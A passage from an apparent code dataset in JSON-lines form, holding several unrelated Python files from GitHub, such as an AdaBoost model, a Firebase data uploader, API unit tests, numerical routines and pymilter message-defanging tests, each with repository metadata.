given feature\n entropy_yx = self.calculate_conditional_entropy(\n prob_x1_y1, prob_x1_y0, prob_x0_y1, prob_x0_y0, prob_xj_0, prob_xj_1)\n ig[feature] = entropy_yx\n\n self.indices = (ig.argsort()[:self.number_of_features_to_select])\n new_X = X[:, self.indices]\n # print(self.indices)\n return new_X\n\n# TODO: Add other Models as necessary.\n\n\nclass AdaBoost(Model):\n\n def __init__(self, iterations):\n super().__init__()\n self.iterations = iterations\n self.num_input_features = None\n self.h_t = []\n\n def fit(self, X, y):\n X = X.toarray()\n self.num_examples, self.num_input_features = X.shape\n y[y <= 0] = -1\n\n # Initialize c_array\n c_array=self.compute_c_values(X, y)\n # Initialize D\n D = np.ones(self.num_examples, dtype=np.float) / self.num_examples\n\n for t in range(self.iterations):\n h_tuple = self.compute_H_values(D, X, y,c_array)\n weight = h_tuple[3]\n if (weight < 0.000001):\n break\n\n c,j,ht,_, pred_vals= h_tuple\n\n x = X[:, j]\n alpha = (math.log((1 - weight) / weight)) / 2\n D = np.multiply(D, (np.exp(-alpha * np.multiply(y, pred_vals))))\n D = D / float(D.sum())\n self.h_t.append([c, j, ht, alpha])\n\n def compute_c_values(self, X, y):\n c_array = np.empty(\n (self.num_examples - 1, self.num_input_features), dtype=np.float)\n for j in range(self.num_input_features):\n x = sorted(X[:, j])\n for k in range(self.num_examples - 1):\n c_array[k, j] = (x[k + 1] + x[k]) / 2\n return c_array\n\n def compute_H_values(self, D, X, y, c_array):\n currError = np.inf\n best_direction = ()\n h_value=()\n for j in range(self.num_input_features):\n for k in range( self.num_examples - 1):\n c = c_array[k, j]\n if c == 0.:\n continue\n for t in range(0, 2):\n yhat_curr = np.ones(self.num_examples, dtype=np.int)\n error_Array = np.ones(self.num_examples, dtype=np.float)\n feature_array = X[:, j]\n direction = (0, 0)\n if (t == 0):\n yhat_curr[feature_array > c] = -1\n direction = (-1, 1)\n elif (t == 1):\n yhat_curr[feature_array <= c] = -1\n direction = (1, -1)\n\n error_Array[yhat_curr == y] = 0\n weight = np.dot(error_Array, D)\n\n if (weight < currError):\n currError = weight\n best_direction = direction\n h_value = (c, j, direction, currError, yhat_curr)\n return h_value\n\n def predict(self, X):\n if self.h_t is [None]:\n raise Exception('fit must be called before predict.')\n\n num_examples, num_input_features = X.shape\n\n if num_input_features < self.num_input_features:\n # X = X.copy()\n X._shape = (num_examples, self.num_input_features)\n # Or perhaps more features are seen at test time, in which case we will\n # simply ignore them.\n if num_input_features > self.num_input_features:\n X = X[:, :self.num_input_features]\n X = X.toarray()\n\n weighted_sum = np.zeros(num_examples)\n yhat = np.empty(num_examples, dtype=np.int)\n\n for h in self.h_t:\n c,j,direction,alpha = h\n x = X[:, j]\n yhat = np.ones((num_examples), dtype=np.int)\n yhat[x > c] = direction[0]\n yhat[x <= c] = direction[1]\n\n weighted_sum = weighted_sum + (alpha * yhat)\n\n yhat = np.sign(weighted_sum)\n yhat[yhat < 0] = 0\n\n return yhat\n","repo_name":"geetsawhney/logistic-regression","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":15035,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"5820740801","text":"# Required\nmetadata = Hash()\n\n@construct\ndef seed():\n #Define metadata values\n metadata['key1'] = 'some value'\n metadata['key2'] = 'some value'\n metadata['key3'] = 'some value'\n\n # Optional: needed if metadata values are intended to be mutable\n metadata['operator'] = ctx.caller # sets operator to the submitter of the contract \n\n# Optional: needed if metadata values are intended to be mutable\n@export\ndef change_meta(key: str, value: Any):\n assert ctx.caller == metadata['operator'], 'Only operator can set metadata!'\n metadata[key] = value","repo_name":"Lamden-Standards/LST002","sub_path":"meta-contract.py","file_name":"meta-contract.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"3701730866","text":"\"\"\"\n 1 文件输入输出(NLP练习)\n 2 JSON 序列化实战练习\n dump:将Python对象按照JSON格式序列化到文件中\n dumps:将Python对象处理成JSON格式的字符串\n load:将文件中的JSON数据反序列化成对象\n loads:将字符串中的内容反序列化成Python对象\n\"\"\"\nimport re\nimport json\n\n\ndef parse(text):\n # 使用正则表达式去除标点符号和换行符\n text = re.sub(r'[^\\w]', ' ', text)\n # 小写\n text = text.lower()\n # 生成所有单词的列表\n words_list = text.split(' ')\n # 去除空白单词\n words_cnt = {}\n for word in words_list:\n if word not in words_cnt:\n words_cnt[word] = 0\n words_cnt[word] += 1\n # 按照词频排序\n sorted_words_cnt = sorted(words_cnt.items(), key=lambda kv: kv[1], reverse=True)\n\n return sorted_words_cnt\n\n\ndef json_pra():\n params = {'symbol': '12345', 'type': 'limit', 'price': 123.4, 'amount': 23}\n params_str = json.dumps(params)\n\n print('after json serialization……')\n print(f'type of params_str = {type(params_str)}, params_str = {params_str}')\n\n original_params = json.loads(params_str)\n\n print('after json deserialization……')\n print(f'type of original_params = {type(original_params)}, original_params = {original_params}')\n\n\nif __name__ == \"__main__\":\n try:\n with open('in.txt', 'r')as f_in:\n txt = f_in.read()\n word_and_freq = parse(txt)\n\n with open('out.txt', 'w')as f_out:\n for words, freq in word_and_freq:\n f_out.write(f'{words} {freq}\\n')\n except IOError as e:\n print(e)\n except Exception as oe:\n print(oe)\n json_pra()\n","repo_name":"xxwqlee/pylearn","sub_path":"GeekTime/fio.py","file_name":"fio.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"48630093","text":"from datetime import datetime\nimport firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import db\nimport time\nfrom random import random\nTEMPERATURE_STRING = \"temperature\"\nHUMIDITY_STRING = \"humidity\"\nMOISTURE_STRING = \"moisture\"\ntdiff=0\n# tdiff=1582731453-time.time()\n\ndef update(name, value):\n print(name + \" \" + str(value))\n ref.child(\"realtime\").update({name: value})\n ref.child(name).update({str(round(time.time()+tdiff)): value})\n\ndef updateWithTime(name, value, time):\n print(name+\" \"+str(value)+\" \"+str(time))\n ref.child(\"realtime\").update({name: value})\n ref.child(name).update({str(time): value})\n\ndef uploadRandomFor2Days():\n last_temp = 15\n last_hum = 30\n last_moi = 30\n j = round(time.time())\n\n i = 0\n while i < 172800:\n t = j - i\n print(t)\n i = i + 600\n last_temp = last_temp + round(random() * 10 - 5)\n last_hum = last_hum + round(random() * 20 - 10)\n last_moi = last_moi + round(random() * 50 - 25)\n if last_temp < 0:\n last_temp = 1\n if last_temp > 30:\n last_temp = 28\n if last_hum < 0:\n last_hum = 3\n if last_hum > 95:\n last_hum = 90\n if last_moi < 0:\n last_moi = 3\n if last_moi > 800:\n last_moi = 760\n updateWithTime(TEMPERATURE_STRING, last_temp, t)\n updateWithTime(HUMIDITY_STRING, last_hum, t)\n updateWithTime(MOISTURE_STRING, last_moi, t)\n updateWithTime('light', last_moi, t)\n\ndef uploadEvery5Seconds(s):\n last_temp = 15\n last_hum = 30\n last_moi = 30\n last_light = 100\n\n for i in range(s):\n last_temp = last_temp + round(random() * 5 - 2.5)\n last_hum = last_hum + round(random() * 20 - 10)\n last_moi = last_moi + round(random() * 80 - 40)\n last_light = last_light + round(random() * 100 - 50)\n if last_temp < 0:\n last_temp = 1\n if last_temp > 30:\n last_temp = 28\n\n if last_hum < 0:\n last_hum = 3\n if last_hum > 95:\n last_hum = 90\n\n if last_moi < 0:\n last_moi = 3\n if last_moi > 800:\n last_moi = 760\n\n if last_light < 0:\n last_light = 5\n if last_light > 800:\n last_light = 760\n update(TEMPERATURE_STRING, last_temp)\n update(HUMIDITY_STRING, last_hum)\n update(MOISTURE_STRING, last_moi)\n update(\"light\", last_light)\n time.sleep(2)\n\n\ncred = credentials.Certificate('serviceAccountKey.json')\nfirebase_admin.initialize_app(cred, {'databaseURL': 'https://solarbabesdb.firebaseio.com/'})\nplantName = \"0002\"\nref = db.reference('heliopots/'+plantName+'/data')\n#\n# update(HUMIDITY_STRING, 12)\n# uploadEvery5Seconds(100000000)\nuploadRandomFor2Days()\n","repo_name":"SolarBabes/HelioPotRobot","sub_path":"other/manualUpdateFirebase.py","file_name":"manualUpdateFirebase.py","file_ext":"py","file_size_in_byte":2820,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"6222056427","text":"import json\n\nimport pytest\nfrom common.api.base import DataAPI, DataDRFAPISet, DRFActionAPI\nfrom common.api.modules.bklogin import BkLoginApi\nfrom common.api.modules.cmsi import CmsiApi\nfrom common.exceptions import ApiRequestError\n\nDEMO_URL = \"http://demo.com/\"\n\n\nclass _StreamApi:\n def __init__(self):\n self.jobs = DataDRFAPISet(\n url=DEMO_URL + \"jobs/\",\n module=\"stream.job\",\n primary_key=\"job_id\",\n description=\"流程任务资源操作集合\",\n default_return_value=(lambda: {\"result\": True, \"data\": \"ok\"}),\n custom_config={\n \"start\": DRFActionAPI(detail=True, method=\"post\"),\n \"top\": DRFActionAPI(detail=False, method=\"get\"),\n },\n )\n self.simple = DataAPI(url=DEMO_URL + \"simple\", method=\"get\", module=\"stream.simple\", description=\"简单接口\")\n self.fail = DataAPI(url=DEMO_URL + \"fail\", method=\"get\", module=\"stream.fail\", description=\"异常接口\")\n\n\nstreamapi = _StreamApi()\n\n\nclass TestStreamApi:\n def test_simple(self, requests_mock):\n requests_mock.get(f\"{DEMO_URL}simple\", complete_qs=False, text=json.dumps({\"result\": True, \"data\": \"OK\"}))\n assert streamapi.simple({}).data == \"OK\"\n\n requests_mock.get(f\"{DEMO_URL}fail\", complete_qs=False, text=\"Bad Gateway\", status_code=\"502\")\n with pytest.raises(ApiRequestError):\n streamapi.fail({})\n\n def test_list(self):\n api = streamapi.jobs.list\n assert api.url == \"http://demo.com/jobs/\"\n assert api.method == \"get\"\n\n def test_create(self):\n api = streamapi.jobs.create\n assert api.url == \"http://demo.com/jobs/\"\n assert api.method == \"post\"\n\n def test_update(self):\n api = streamapi.jobs.update\n assert api.url == \"http://demo.com/jobs/{job_id}/\"\n assert api.method == \"put\"\n\n def test_partial_update(self):\n api = streamapi.jobs.partial_update\n assert api.url == \"http://demo.com/jobs/{job_id}/\"\n assert api.method == \"patch\"\n\n def test_delete(self):\n api = streamapi.jobs.delete\n assert api.url == \"http://demo.com/jobs/{job_id}/\"\n assert api.method == \"delete\"\n\n def test_retrieve(self):\n api = streamapi.jobs.retrieve\n assert api.url == \"http://demo.com/jobs/{job_id}/\"\n assert api.method == \"get\"\n\n def test_start(self):\n api = streamapi.jobs.start\n assert api.url == \"http://demo.com/jobs/{job_id}/start/\"\n assert api.method == \"post\"\n\n def test_top(self):\n api = streamapi.jobs.top\n assert api.url == \"http://demo.com/jobs/top/\"\n assert api.method == \"get\"\n\n\nclass TestModuleAPI:\n def test_cmsi(self, requests_mock):\n requests_mock.post(\n \"/api/c/compapi/v2/cmsi/send_rtx/\",\n complete_qs=False,\n text=json.dumps({\"result\": True, \"message\": \"企业微信消息发送成功\"}),\n )\n response = CmsiApi.send_eewechat({\"receivers\": [\"user01\", \"user02\"], \"message\": \"WTF, fighting....\"})\n assert response.message == \"企业微信消息发送成功\"\n\n def test_bklogin(self):\n response = BkLoginApi.get_user_info({\"bk_username\": \"admin\"})\n assert response.is_success()\n assert response.data == {}\n","repo_name":"Tencent/bk-base","sub_path":"src/api/upizza/tests/test_common_api.py","file_name":"test_common_api.py","file_ext":"py","file_size_in_byte":3318,"program_lang":"python","lang":"en","doc_type":"code","stars":85,"dataset":"github-code","pt":"18"} +{"seq_id":"9758470304","text":"import sys\nimport math\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nisoterma = []\ninterna = []\nexterna = []\ndataFile = open(sys.argv[1], 'r')\n\nradio_interno = int(sys.argv[2])\nradio_externo = int(sys.argv[3])\n\nnum_angulos = 0\nfor line in dataFile:\n\tdata = line.split()\n\tisoterma.append(float(data[0]))\n\tinterna.append(radio_interno)\n\texterna.append(radio_externo)\n\tnum_angulos = num_angulos + 1\n\nisoterma.append(isoterma[0])\ninterna.append(radio_interno)\nexterna.append(radio_externo)\n\ndelta_angulo = 2 * np.pi / num_angulos\nangulos = np.arange(0, 2 * np.pi, delta_angulo).tolist()\nangulos.append(0)\n\n# index = 0\n# for line in isoterma:\n\t# print math.degrees(angulos[index]), isoterma[index]\n\t# index = index + 1\n\n# print isoterma\n# print num_angulos\n# print delta_angulo\n# print angulos\n\nax = plt.subplot(111, polar=True, axisbg=(0.9, 0.9, 0.9))\nax.plot(angulos, interna, color='b', linewidth=4)\nax.plot(angulos, isoterma, color='r', linewidth=1)\nax.plot(angulos, externa, color='g', linewidth=3)\nax.set_yticks(range(0, int(1.5 * radio_externo), 100))\nax.grid(True)\n\nax.set_title(\"Ubicacion de la isoterma\", va='bottom')\nplt.savefig(sys.argv[1] + \".png\")\nplt.close()\n","repo_name":"svilerino/metnum","sub_path":"tp1/src/tools/plotter_isoterma.py","file_name":"plotter_isoterma.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"26673400130","text":"class Device(object):\n def __init__(self, data):\n self.m_data = data\n self.m_clientVersion = data[\"clientVersion\"]\n self.m_deviceName = data[\"device\"]\n self.m_deviceId = data[\"deviceId\"]\n self.m_pushToken = data[\"pushToken\"]\n self.m_platform = data[\"platform\"]\n self.m_language = data[\"language\"]\n self.m_timezone = data[\"timezone\"]\n\n def __repr__(self) -> str:\n return f\"\"","repo_name":"torresflo/PyReal","sub_path":"API/Model/Device.py","file_name":"Device.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"30752873900","text":"#!/usr/bin/env python3\n\nfrom distutils.core import setup, Extension\nimport os\nimport os.path\nimport re\n\nuse_cython = 1\nif use_cython:\n from Cython.Distutils import build_ext\n ext_modules = [Extension(\"primitives\",\n [\"src/gensokyo/cython/primitives.pyx\"])]\nelse:\n class build_ext: pass\n ext_modules = [Extension(\"primitives\",\n [\"src/gensokyo/cython/primitives.c\"])]\n\n\ndef get_resources(dir):\n l = []\n rget_resources(dir, l)\n return l\n\ndef make_listing(dir):\n return (dir, [os.path.join(dir, x) for x in os.listdir(dir) if\n os.path.isfile(os.path.join(dir, x))])\n\ndef rget_resources(dir, l):\n l.append(make_listing(dir))\n for d in os.listdir(dir):\n if os.path.isdir(os.path.join(dir, d)):\n rget_resources(os.path.join(dir, d), l)\n\np_py = re.compile(r'(.+)\\.py')\ndef get_modules(dir):\n return [p_py.match(x).group(1) for x in os.listdir(dir) if p_py.match(x)]\n\ndef get_packages(dir):\n l = []\n rget_packages(dir, '', l)\n return l\n\ndef rget_packages(start, dir, l):\n ls = os.listdir(os.path.join(start, dir))\n if '__init__.py' in ls:\n l.append(dir.replace('/', '.'))\n for x in [x for x in ls if os.path.isdir(os.path.join(start, dir, x))]:\n rget_packages(start, os.path.join(dir, x), l)\n\nsetup(\n name = 'TouhouS',\n version='1.0',\n description='TouhouS game',\n author='Allen Li',\n author_email='darkfeline@abagofapples.com',\n package_dir={'':'src'},\n py_modules=get_modules('src'),\n packages=get_packages('src'),\n cmdclass = {'build_ext': build_ext},\n ext_package = 'gensokyo',\n ext_modules = ext_modules,\n scripts=['src/touhouS.py', 'bin/profile.py'],\n data_files=get_resources('resources')\n)\n","repo_name":"darkfeline/TouhouS","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"75052450279","text":"from __future__ import print_function\nfrom fractions import Fraction\nimport numpy as np\nimport sympy as sp\n\nn = input(\"Enter the number of equations in the system : \")\nA = [[0 for j in range(4)] for i in range(n)]\ny = [0 for j in range(n)]\n\ndef main():\n\tfor i in range (n):\n\t\tprint(\"Equation number \" + str(i+1) + \" : \")\n\t\ttemp = raw_input()\n\t\ttemp = temp.split(\" \")\n\t\tfor j in range(4):\n\t\t\tA[i][j] = Fraction(temp[j])\n\tcalc_y(n)\n\ndef print_aug():\n\tfor i in range(n):\n\t\tfor j in range(4):\n\t\t\tprint (\"%10.5f\" %float(A[i][j]), end = \" \")\n\t\t\t# print(float(A[i][j]), end = \" \")\n\t\tprint()\n\tprint()\n\ndef print_ans():\n\tfor i in range(n):\n\t\tprint (\"y\" + str(i+1) + \" : \" + str(float(y[i])))\n\ndef calc_y(t):\n\tprint_aug()\n\tfor i in range(1,t):\n\t\tmf = Fraction(A[i][0]/A[i-1][1]) \n\t\tA[i][0] -= Fraction((mf)*A[i-1][1])\n\t\tA[i][1] -= Fraction((mf)*A[i-1][2])\n\t\tA[i][3] -= Fraction((mf)*A[i-1][3])\n\tprint(\"Augmented matrix after thomas's algo : \")\n\tprint_aug()\n\n\ty[t-1] = Fraction((A[t-1][3]/A[t-1][1]))\n\n\tfor j in range(t-2,-1,-1):\n\t\ty[j] = Fraction((A[j][3] - A[j][2] * y[j+1])/A[j][1])\n\n\tprint_ans()\n\nmain()","repo_name":"divyanshu-talwar/Numerical-Methods","sub_path":"Assignment3/question3/question3.py","file_name":"question3.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"18"} +{"seq_id":"15372142633","text":"\nclass LinkList(object):\n def __init__(self, data=0, next=None):\n self.data = data\n self.next = next\n\n def __repr__(self):\n return str(self.data) + \" \" + str(self.next)\n\nclass BSTNode(object):\n def __init__(self, data=0, left=None, right=None):\n self.data = data\n self.left, self.right = left, right\n\n def __repr__(self):\n return str(self.data) + \" \" + str(self.left) + \" \" + str(self.right)\n\ndef form_node(L):\n s = LinkList(0, L)\n f = L\n while f and f.next:\n s, f = s.next, f.next.next\n node = s.next\n s.next = None\n # Consider the case when there is only one node in the list.\n return (L if L != node else None, node.data, node.next)\n\ndef build_bst_from_sorteed_list(L):\n if not L:\n return None\n left_bst_list, node_data, right_bst_list = form_node(L)\n return BSTNode( node_data,\n build_bst_from_sorteed_list(left_bst_list),\n build_bst_from_sorteed_list(right_bst_list))\n\nif __name__ == \"__main__\":\n L = LinkList(1, LinkList(2, LinkList(3, LinkList(4))))\n print (L)\n tree = build_bst_from_sorteed_list(L)\n print (tree)\n","repo_name":"litakgit/DSAlgo","sub_path":"IC_Problems/86_sorted_list_to_bst.py","file_name":"86_sorted_list_to_bst.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"23472752142","text":"import sys\n\ninput = sys.stdin.readline\n\nN = int(input())\nheights = [int(input()) for _ in range(N)]\n\ncount = 0\nstack = []\n\nfor height in heights:\n nowcount = 1\n while stack:\n if height >= stack[-1][0]:\n count += stack[-1][1]\n\n if height == stack[-1][0]:\n nowcount += stack[-1][1]\n\n stack.pop()\n\n else:\n count += 1\n break\n\n stack.append((height, nowcount))\n\nprint(count)","repo_name":"StepByStep-Algorithm/2021Fall","sub_path":"WEEK1-A/leehe228/boj3015.py","file_name":"boj3015.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"75294847079","text":"import unittest\nimport Milter\nimport sample\nimport mime\nimport rfc822\nimport StringIO\nfrom Milter.test import TestBase\n\nclass TestMilter(TestBase,sample.sampleMilter):\n def __init__(self):\n TestBase.__init__(self)\n sample.sampleMilter.__init__(self)\n\nclass BMSMilterTestCase(unittest.TestCase):\n\n def testDefang(self,fname='virus1'):\n milter = TestMilter()\n rc = milter.connect()\n self.failUnless(rc == Milter.CONTINUE)\n rc = milter.feedMsg(fname)\n self.failUnless(rc == Milter.ACCEPT)\n self.failUnless(milter._bodyreplaced,\"Message body not replaced\")\n fp = milter._body\n open('test/'+fname+\".tstout\",\"w\").write(fp.getvalue())\n #self.failUnless(fp.getvalue() == open(\"test/virus1.out\",\"r\").read())\n fp.seek(0)\n msg = mime.message_from_file(fp)\n s = msg.get_payload(1).get_payload()\n milter.log(s)\n milter.close()\n\n def testParse(self,fname='spam7'):\n milter = TestMilter()\n milter.connect('somehost')\n rc = milter.feedMsg(fname)\n self.failUnless(rc == Milter.ACCEPT)\n self.failIf(milter._bodyreplaced,\"Milter needlessly replaced body.\")\n fp = milter._body\n open('test/'+fname+\".tstout\",\"w\").write(fp.getvalue())\n milter.close()\n\n def testDefang2(self):\n milter = TestMilter()\n milter.connect('somehost')\n rc = milter.feedMsg('samp1')\n self.failUnless(rc == Milter.ACCEPT)\n self.failIf(milter._bodyreplaced,\"Milter needlessly replaced body.\")\n rc = milter.feedMsg(\"virus3\")\n self.failUnless(rc == Milter.ACCEPT)\n self.failUnless(milter._bodyreplaced,\"Message body not replaced\")\n fp = milter._body\n open(\"test/virus3.tstout\",\"w\").write(fp.getvalue())\n #self.failUnless(fp.getvalue() == open(\"test/virus3.out\",\"r\").read())\n rc = milter.feedMsg(\"virus6\")\n self.failUnless(rc == Milter.ACCEPT)\n self.failUnless(milter._bodyreplaced,\"Message body not replaced\")\n self.failUnless(milter._headerschanged,\"Message headers not adjusted\")\n fp = milter._body\n open(\"test/virus6.tstout\",\"w\").write(fp.getvalue())\n milter.close()\n\ndef suite(): return unittest.makeSuite(BMSMilterTestCase,'test')\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"jmehnle/pymilter","sub_path":"testsample.py","file_name":"testsample.py","file_ext":"py","file_size_in_byte":2160,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"18"} +{"seq_id":"16324198100","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n#from einops import rearrange, reduce\n#from einops.layers.torch import Rearrange\n\nfrom src.models.helpers import *\n\n# -------------------------------------------------- Weighted conv ------------------------------------------------\nclass WeightStandardizedConv2d(nn.Conv2d):\n \"\"\"\n https://arxiv.org/abs/1903.10520\n weight standardization purportedly works synergistically with group normalization\n \n SF: do not use einops\n Adopted from https://huggingface.co/blog/annotated-diffusion\n \"\"\"\n def forward(self, x):\n eps = 1e-5 if x.dtype == torch.float32 else 1e-4\n\n weight = self.weight\n mean = torch.mean(weight, dim = [1, 2, 3], keepdim = True) \n var = torch.var(weight, unbiased = False, dim = [1, 2, 3], keepdim = True)\n normalized_weight = (weight - mean) * (var + eps).rsqrt()\n\n return F.conv2d(\n x,\n normalized_weight,\n self.bias,\n self.stride,\n self.padding,\n self.dilation,\n self.groups,\n )\n\n## --------------------------------------------------- ConvBlock --------------------------------------------------\nclass conv_block(nn.Module):\n \"\"\" Adopted from: https://huggingface.co/blog/annotated-diffusion \"\"\"\n def __init__(self, dim, dim_out, groups=8):\n super().__init__()\n self.proj = WeightStandardizedConv2d(dim, dim_out, 3, padding=1)\n self.norm = nn.GroupNorm(groups, dim_out)\n self.act = nn.SiLU()\n\n def forward(self, x, scale_shift=None):\n x = self.proj(x)\n x = self.norm(x)\n\n if exists(scale_shift):\n scale, shift = scale_shift\n x = x * (scale + 1) + shift\n\n x = self.act(x)\n return x\n\n# -------------------------------------------------- ResNet block -------------------------------------------------\nclass ResnetBlock(nn.Module):\n \"\"\"\n https://arxiv.org/abs/1512.03385\n Adopted from: https://huggingface.co/blog/annotated-diffusion\n \"\"\"\n\n def __init__(self, in_channels, out_channels, \n res_hidden=None,\n time_emb_dim=None, groups=8):\n super().__init__()\n \n self.mlp = None\n if exists(time_emb_dim):\n self.mlp = nn.Sequential(nn.SiLU(), \n nn.Linear(time_emb_dim, out_channels * 2)\n )\n\n if not res_hidden:\n res_hidden = out_channels\n \n self.block1 = conv_block(in_channels, res_hidden, groups=groups)\n self.block2 = conv_block(res_hidden, out_channels, groups=groups)\n \n if in_channels != out_channels:\n self.res_conv = nn.Conv2d(in_channels, out_channels, 1)\n else:\n self.res_conv = nn.Identity()\n\n def forward(self, x, time_emb = None):\n scale_shift = None\n if exists(self.mlp) and exists(time_emb):\n time_emb = self.mlp(time_emb)\n #time_emb = rearrange(time_emb, \"b c -> b c 1 1\")\n time_emb = time_emb.view(time_emb.shape[0], time_emb.shape[1], 1, 1)\n scale_shift = time_emb.chunk(2, dim=1)\n\n h = self.block1(x, scale_shift=scale_shift)\n h = self.block2(h)\n return h + self.res_conv(x)\n\n# --------------------------------------------------- Upsampling --------------------------------------------------\ndef Upsample(dim, dim_out = None, conv = 'bilinear', scale = 2):\n \"\"\"\n Upsampling the input data. For possible compatibility with some of my old code\n I leave option to use ConvTransposed2D\n \"\"\"\n if 'conv' in conv:\n return UpsampleConv(dim, dim_out)\n elif conv in ['nearest', 'linear', 'bilinear', 'bicubic', 'trilinear']:\n return UpsampleInterp(dim, dim_out, conv, scale)\n else:\n raise ValueError(f\"Expected conv ot be 'conv', 'nearest', 'linear', 'bilinear', 'bicubic', 'trilinear', got '{conv}'\")\n \n \ndef UpsampleInterp(dim, dim_out = None, interp = 'linear', scale = 2, def_align_corners = False):\n assert scale is not None and scale != 0, f'Scale must be specified!'\n if not dim_out:\n dim_out = dim\n if interp in ['linear', 'bilinear', 'bicubic', 'trilinear']:\n align_corners = def_align_corners # check if helps against checkerboard pattern, was: True\n else:\n align_corners = None\n #align_corners = None # check if helps against checkerboard pattern\n return nn.Sequential(\n nn.Upsample(scale_factor=scale, mode=interp, align_corners=align_corners),\n nn.Conv2d(in_channels=dim,\n out_channels=dim_out, \n kernel_size=3, \n padding=1),\n nn.GroupNorm(max(1, dim_out//4), dim_out)\n )\n\n\ndef UpsampleConv(dim, dim_out=None):\n convT_kernel = 4\n convT_stride = 2\n convT_padding = 1\n if not dim_out:\n dim_out = dim\n return nn.Sequential(\n nn.ConvTranspose2d(in_channels=dim,\n out_channels=dim_out,\n kernel_size=convT_kernel, \n stride=convT_stride, \n padding=convT_padding),\n nn.GroupNorm(max(1, dim_out//4), dim_out)\n )\n\n# -------------------------------------------------- Downsampling -------------------------------------------------\ndef Downsample(dim, dim_out = None, mode = 'avg', kern = 2):\n \"\"\" Downsampling. Left strided conv2d for legacy \"\"\"\n if 'conv' in mode:\n return DownsampleConv(dim, dim_out)\n else:\n assert kern is not None and kern != 0, f'Kernel size must be specified!'\n return DownsamplePool(dim, dim_out, mode, kern)\n\n\ndef DownsamplePool(dim, dim_out=None, mode = 'avg', kern = 2):\n if 'avg' in mode or 'mean' in mode:\n pooling = nn.AvgPool2d(kernel_size = kern)\n elif 'max' in mode:\n pooling = nn.MaxPool2d(kernel_size=kern)\n else:\n raise ValueError(f\"Expected mode to be 'avg'/'mean' or 'max', got {mode} instead\")\n if not dim_out:\n dim_out = dim\n return nn.Sequential(\n pooling, \n nn.Conv2d(in_channels=dim,\n out_channels=dim_out, \n kernel_size=3, \n padding=1),\n nn.GroupNorm(max(1, dim_out//4), dim_out)\n )\n\n\ndef DownsampleConv(dim, dim_out=None):\n conv_kernel = 3\n stride = 2\n padding = 1\n if not dim_out:\n dim_out = dim\n return nn.Sequential(\n nn.Conv2d(in_channels=dim, \n out_channels=dim_out,\n kernel_size=conv_kernel,\n stride=stride, padding=padding),\n nn.GroupNorm(max(1, dim_out//4), dim_out))","repo_name":"stanipov/pytorch-diffusion","sub_path":"src/models/conv_blocks.py","file_name":"conv_blocks.py","file_ext":"py","file_size_in_byte":6783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"20688389539","text":"from mpt.models import db\nfrom mpt.models.base_model import base_model\nfrom mpt.models.project import project_assignment\nfrom sqlalchemy import Column, String, Integer, Text\n\n\nclass User(base_model):\n __tablename__ = \"users\"\n\n first_name = Column(String(50), nullable=False)\n last_name = Column(String(50), nullable=False)\n position = Column(String(15), nullable=False)\n tasks = db.relationship(\n \"Task\",\n cascade=\"all, delete-orphan\",\n lazy=True\n )\n projects = db.relationship(\n \"Project\",\n secondary=project_assignment,\n lazy=True\n )\n\n def __repr__(self):\n return f''\n","repo_name":"morsemars/morse-project-tracker","sub_path":"mpt/models/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"73858725799","text":"# coding: UTF-8\nimport os\nimport time\nimport glob\nimport torch\nimport numpy as np\nfrom importlib import import_module\nimport argparse\nfrom tools.common import seed_everything, init_logger, logger\nfrom processors import glue_output_modes as output_modes\nfrom processors import glue_processors as processors\nfrom pytorch_pretrained.file_utils import WEIGHTS_NAME\n\n\ndef get_args():\n parser = argparse.ArgumentParser(description='Chinese Text Classification')\n parser.add_argument(\"--data_dir\", default=None, type=str, required=True,\n help=\"The input data dir. Should contain the .tsv files (or other data files) for the task.\")\n parser.add_argument('--model_type', type=str, required=True,\n help='choose a model: TextCNN, TextRNN, FastText, TextRCNN, TextRNN_Att, DPCNN, Transformer, bert, ERNIE, albert')\n parser.add_argument(\"--model_name_or_path\", default=None, type=str, required=True,\n help=\"Path to pre-trained model or shortcut name selected in the list\")\n parser.add_argument(\"--task_name\", default='THUCNews', type=str, required=True,\n help=\"The name of the task to train selected in the list: \" + \", \".join(processors.keys()))\n parser.add_argument(\"--output_dir\", default=None, type=str, required=True,\n help=\"The output directory where the model predictions and checkpoints will be written.\")\n parser.add_argument('--embedding_type', default='random', type=str,\n help='random or pre_trained')\n parser.add_argument('--use_word', action='store_true',\n help='True for word, False for char')\n\n parser.add_argument(\"--max_seq_length\", default=512, type=int,\n help=\"The maximum total input sequence length after tokenization. Sequences longer \"\n \"than this will be truncated, sequences shorter will be padded.\")\n parser.add_argument(\"--do_train\", action='store_true',\n help=\"Whether to run training.\")\n 